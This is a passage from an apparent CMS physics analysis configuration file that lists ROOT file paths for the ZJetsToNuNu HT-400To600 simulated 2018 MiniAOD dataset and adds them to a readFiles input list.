'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/1064CAB8-E284-9C47-B62D-261757F140C3.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/12697F3F-448A-D840-BA6F-FC6B3B5CD227.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/12773CCC-7E4D-AA47-BBE4-BE927E373C18.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/13A079B2-D149-6B45-8B3E-D8A615F7A493.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/1454ACE8-199A-8249-B608-7D0CCE048518.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/14821BDC-775B-7441-AAD4-2BD23B70CD57.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/168B7C09-0083-5A48-A7DC-5E64E215C9F9.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/172E3763-058A-6047-9E52-EFD76D8C1D82.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/18304A30-383A-9E47-88A0-7FD1E2E6320C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/1852CC73-29E6-194B-A910-8F96DB3F944A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/18B1230F-4E4F-7743-B72D-10617395D9C6.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/18C09836-97A5-E044-8EAA-46EFE38EE248.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/18E2D29C-28D6-D145-9656-6E6A302CFEEC.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/1A00FEE7-4EFC-8F4E-8AEC-7784FA7DF7F4.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/1ACC1498-9404-A647-8BE4-BC12FD3DE7FB.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/1AF1CB9D-DE0C-454A-A5C3-F2A4B61E8D9B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/1BAAC84B-B84B-2944-8A6C-FF439433B42C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/1D25308E-4397-D94E-9941-FCBB91EE2067.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/1D287280-D67C-AB42-8D31-8DA0022847D7.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/1DDD06DE-EEF5-664B-80CB-5BD2499EF6D6.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/1DDE94D5-10F4-764C-8DE7-D34E96B6E318.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/1E2E9400-C88A-7F4D-BB21-A72EC3412242.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/1EC9D168-80FC-4847-BFC0-8D0A93812C06.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/2070BF72-2888-FC46-80D5-CC7127ADFAFD.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/25C224FE-2115-E24A-AD94-199A878A37AA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/25F1ACC5-2F8B-7F46-8ACB-10508C8D15FB.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/26B5D7DC-28F2-E94C-84B9-89283FCFD032.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/26C1EBE1-9274-C94D-99A7-BBE21D0EF210.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/26D57FB7-979B-C14C-858B-06927FB6044A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/27B9DF6F-9C5E-074E-9754-870D1FD74203.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/28437A0F-B5A6-1948-8026-512644A245E6.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/28BE85CA-9D96-BF4C-B5A4-B43C48C69794.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/296F69AA-B85A-544A-ABCF-AEDC4959844C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/2A3FB7E1-66FF-DD43-9482-41CF7673ABEC.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/2A83AE36-8CC2-1447-BF42-9B1799CAE4B0.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/2BA2A60C-59EF-2A41-B6EC-80B0C1F21F8B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/2C4B9969-C963-DD4D-8B96-83804F84F1ED.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/2CB9DA09-12DE-6640-A369-F837DD092489.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/2D2E635E-DBC8-8040-B788-CF1AB11C190F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/2E3BD640-4B9C-0146-B844-6AFADA6830F4.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/2FBC854C-E325-4341-AECA-598997915FF2.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/316763AE-0ED9-0943-9D12-29C42B82CA1E.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/31CD3DD0-D4A9-D24C-8FD8-E2053266B603.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/332A3C5E-E3E0-3242-B592-8B347D84E646.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/338EB71F-4006-104E-93A4-2706F29E13CF.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/34B65DB8-E462-4344-8320-42B8656B131D.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/34FD4CD6-5F30-CD49-BB54-0824CCF53AA6.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/36522013-C815-B143-A564-7FEE87F9553C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/36670C6E-95FC-174C-A735-DADA2A105705.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/36DAB7F0-6B51-6340-ADD2-2E8DC807F023.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/373B94D1-AF54-F849-93B1-11655C0819B5.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/38502967-3A71-D141-9890-78067EE5AB0B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/3A25795A-FAA7-EA44-8E2E-F537B5EA2EDF.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/3A9CF632-4029-7145-A58E-1E9081F181D0.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/3BCE5EC0-CAA1-8847-BFA1-71FFA539888A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/3BE8FBDA-E563-DA4E-BD73-191C316ED49B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/3DAE52BB-F7E8-B84F-AC27-AB17ADD36C20.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/3E079D76-0F3E-264C-91D8-9A8502027D17.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/400A522A-19AD-A74A-8BEF-DC23F474309B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/40165159-AC94-2547-9206-C049E0B572AA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/40B5AC06-9465-6443-8B7F-8D1593D1C700.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/41163EED-B113-F848-900A-FC1EB200FC10.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/428D52A2-FCCB-7C44-8B56-AD834083D54A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/42D7D071-0470-9245-BD1F-3EFD5848903C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/4426742B-D4F1-DC4E-907C-1B1D33C2F05A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/466826B3-609D-7F48-A23E-C16300732841.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/46B75CDA-EA31-4A44-9D8E-4F40A23193A9.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/47A04135-54A0-1445-BF4D-4F0775DDAA85.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/47E18523-788C-384C-AE0F-512437A2EDE6.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/4849A203-5D0B-A94B-B06E-235A3B9EF2AC.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/490A4EEB-86A9-1F4A-B752-10D1C9775B8A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/493E1F36-4EF6-764C-A0AD-2B4A70264173.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/4972445F-E07A-7D48-BD5A-6619FB413141.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/4AC79677-4133-7845-BCB0-9270EBDD420F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/4B33E9B7-B62A-F44F-AAB9-C4D857B1B844.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/4B521DD1-7D3C-D44E-A4E5-46CBC56DCA40.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/4C481D06-6699-4C4A-BC32-04AC1E6C02BA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/4E426DC1-1C67-DA43-BE2E-2818F324BD74.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/4FA71150-F4D7-9847-AE1E-D79997E60E55.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/4FD4AB94-516F-9D4A-8486-1D7D1B22C31A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/50CA57EC-F23F-A444-92C2-E4A20DF1A9DA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/51909116-539A-8145-A549-D2A6EC99598A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/51CC574E-453C-7D42-9B87-E9B7CD60F19A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/52215B16-DE48-CC4D-BAAD-787A8A4F62C8.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/53DA7072-B28C-3C40-9A13-BF4F8A45004C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/541C3F91-D2A0-E346-8861-78F155A18194.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/56D6FAD8-1330-A14C-8003-DE2E9A382CB6.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/574F080C-88D6-4C49-AD0A-4895EC537464.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/5ADDD027-96ED-124D-AED3-C95BD18F91CC.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/5AEAF952-0394-DF49-899B-D1C3CE495965.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/5C083167-53B4-4043-B506-C2D2BA13DED2.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/5DB3A6D8-D851-AA47-A0E8-E050C2B3BFCE.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/5DB5CABB-4220-274E-9CF4-C4931DCB4C3F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/5DE048E9-ED4C-C148-AA91-1043A89F7040.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/5E119A8E-07FE-924F-8CE7-1E060208C387.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/5E2FAD04-C8CA-3348-BD24-57274F850967.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/5FC253C2-1BF1-C542-A72A-4D7496C266D9.root',
] )
readFiles.extend( [
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/6027659F-DACB-774F-BFBB-2405F0606FC8.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/626BBFC3-00C4-DA4C-A23D-13E7D7DEB8EE.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/649445AA-DBEB-9A4C-AFB3-76058E56ADD8.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/64A7AE82-93B9-D24E-8937-E8C1F9BA84B1.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/64D7C129-09AA-3D4B-886D-21B4E6D1B5D1.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/656D90FE-8FAD-D34E-B919-C96EF3763627.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/6603A66A-55E0-E64E-80AF-95057C47986B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/67AAD2CA-7983-134B-8E33-475D900C047B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/6CD445FC-D3D0-4149-9CF1-B109749BAD25.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/6E0AA4AD-6AA4-DF49-A897-4FAB08AF4749.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/7155BAD1-5847-E348-9AD5-5063D7E1B622.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/71974EBE-3800-FF41-8C11-B42E3D33DBF9.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/77C1D89D-5202-6548-8565-9CF9F0797DD3.root',
